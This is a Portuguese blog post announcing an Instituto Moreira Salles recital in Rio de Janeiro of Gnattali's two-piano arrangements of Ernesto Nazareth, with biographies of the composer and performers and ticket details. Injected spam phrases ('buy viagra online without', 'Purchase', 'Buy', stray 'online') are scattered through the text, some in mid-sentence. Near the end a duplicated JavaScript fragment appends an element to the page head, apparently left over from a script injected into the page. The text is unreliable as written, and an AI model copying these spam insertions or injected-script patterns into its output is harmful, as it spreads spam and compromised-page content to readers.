Música de câmaraProgramaçãoRio de Janeiro

Dois pianos para Ernesto Nazareth

Maria Teresa Madeira e Alexandre Dias tocam, no RJ, arranjos para dois pianos feitos por Radamés Gnattali para obras de Ernesto Nazareth. online

 

Guardião do acervo de Ernesto Nazareth, um dos compositores mais importantes do Brasil, o Instituto Moreira Salles vai comemorar os 152 anos do compositor com o recital Ernesto Nazareth 150 + 2: Os arranjos de Radamés Gnattali na sede carioca do Instituto. A data de aniversário de Nazareth é 20 de março, mas a apresentação acontecerá no dia 26, quinta-feira, às 20 horas, com Maria Teresa Madeira e Alexandre Dias executando os arranjos para dois pianos feitos por Radamés Gnattali para obras do compositor. Os ingressos estão à venda a partir do dia 10 de março, na recepção do IMS-RJ.

Além da primeira apresentação para público, já que alguns desses arranjos nunca foram gravados e vários deles só foram executados anteriormente por Radamés e Aída Gnattali, sua irmã, na Rádio Nacional e na Rádio MEC, nos anos 1950 e 1960, as partituras, editoradas e revisadas pela primeira vez, ficarão disponíveis para download gratuito no site buy viagra online without www.ernestonazareth150anos.com.br.

O programa apresenta as célebres Apanhei-te cavaquinho, Odeon, Fon-Fon!, Elegantíssima Purchase , Improviso, entre outras. Nos arranjos inéditos destacam-se as obras Matuto, Carioca, Labirinto e Batuque.

 

Sobre Ernesto Nazareth

Ernesto Nazareth (1863-1934) é um dos compositores mais importantes do Brasil. Definido por Villa-Lobos como “a verdadeira encarnação da alma musical brasileira”, influenciou gerações e gerações de músicos, contribuindo decisivamente para a formação de nossa identidade musical.

A despeito de seu protagonismo na história da música popular, Nazareth ainda é um universo a ser explorado. Apesar de ter composto algumas das peças brasileiras mais gravadas em todos os tempos – Brejeiro, online Odeon e Apanhei-te cavaquinho –, boa parte de suas mais de 200 obras permanece pouco conhecida. Nazareth foi contemporâneo do nascimento da música popular urbana no Rio de Janeiro imperial e republicano, da explosão da polca e da formação dos primeiros conjuntos de choro.

 

Sobre Radamés Gnattali

Radamés Gnattali (1906-1988), pianista, maestro, compositor e arranjador, é figura fundamental para entender a música brasileira, pois circulou com extrema naturalidade entre os universos popular e erudito. Nascido em Porto Alegre, foi envolvido desde cedo pela paixão que os pais nutriam pela ópera, que se refletiu nos nomes dos três filhos do casal: Radamés, Aída e Ernâni, personagens de óperas de Verdi. Aprendeu piano com a mãe e, aos 14 anos, entrou no Conservatório de Porto Alegre para estudar piano, e acabou dominando também a viola. Radicou-se no Rio de Janeiro no início dos anos 1930, onde, em 1924, havia conhecido o compositor Ernesto Nazareth. Durante toda sua vida, a obra de Nazareth esteve presente, seja nos diversos arranjos que criou para suas músicas em diferentes formações instrumentais, seja em sua atividade como pianista, em que gravou várias dessas peças.

 

Sobre Maria Teresa Madeira

Pianista nascida no Rio de Janeiro em 1960, formou-se em piano pela Universidade Federal do Rio de Janeiro e fez pós-graduação nos Estados Unidos. Apesar da formação erudita, transita com naturalidade também no universo da música popular. Em 1997, gravou o disco Sempre Nazareth ao lado do bandolinista Pedro Amorim, dedicado à obra de Nazareth, e atualmente está gravando a obra completa do compositor.

 

Sobre Alexandre Dias

Pianista, pesquisador de música brasileira e professor, nascido em Brasília em 1984. Iniciou seus estudos de piano aos 10 anos. Desenvolve intensa pesquisa sobre música brasileira do final do século 19 e início do século 20, com especial ênfase em Ernesto Nazareth. Desde 1999, pesquisa a obra e a discografia do compositor. Entre 2007 e 2012, gravou cerca de 70 músicas raras de Nazareth, estimulando a difusão de sua obra. A partir de 2012, passou a coordenar o site Ernesto Nazareth 150 anos, a convite do Instituto Moreira Salles, para o qual forneceu sua coleção de mais de 2 mil gravações, além de escrever textos sobre diversas facetas da obra do artista.

 

Buy Sobre o site

Com coordenação do pianista e pesquisador Alexandre Dias, especialista na obra de Nazareth, do violonista e arranjador Paulo Aragão, idealizador do portal, e de Bia Paes Leme, coordenadora do acervo de música do IMS, o site www.ernestonazareth150anos.com.br dá acesso às partituras das 211 composições de Nazareth na versão original para piano, além de 120 composições na inédita versão melodia e cifra, todas com a possibilidade de download em PDF. Também estão ali textos exclusivos sobre cada obra de Nazareth; acesso à discografia completa – são mais de 2 mil gravações feitas até hoje que podem ser ouvidas em streaming; linha do tempo e biografia inédita do compositor elaborada pelo biógrafo de Nazareth, Luiz Antonio de Almeida; um blog Purchase com diversos textos investigativos; manuscritos do compositor; arranjos para formações instrumentais variadas; farto acervo de imagens e uma hemeroteca. Algumas raridades estão no ar, como uma carta documentando um encontro (até hoje desconhecido) entre Nazareth e o escritor Machado de Assis.

O IMS tem como parceiro e colaborador o portal Música Brasilis, iniciativa da cravista e pesquisadora Rosana Lanzelotte, primeiro site a disponibilizar toda a obra de Nazareth na internet.

Fonte: Instituto Moreira Salles

 

SERVIÇO:

Ernesto Nazareth 150 + 2: Os arranjos de Radamés Gnattali

online Recital para dois pianos com Maria Teresa Madeira e Alexandre Dia online s

 

26 de março, quinta-feira, às 20h

Instituto Moreira Salles (R. Marquês de São Vicente, 476, Gávea – Rio de Janeiro. Tel.: 21 3284-7400)

 

Ingressos a R$ 30 (inteira) e R$ 15 (meia)

Máximo de dois ingressos por pessoa

Venda a partir do dia 10 de março, apenas no IMS-RJ

d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.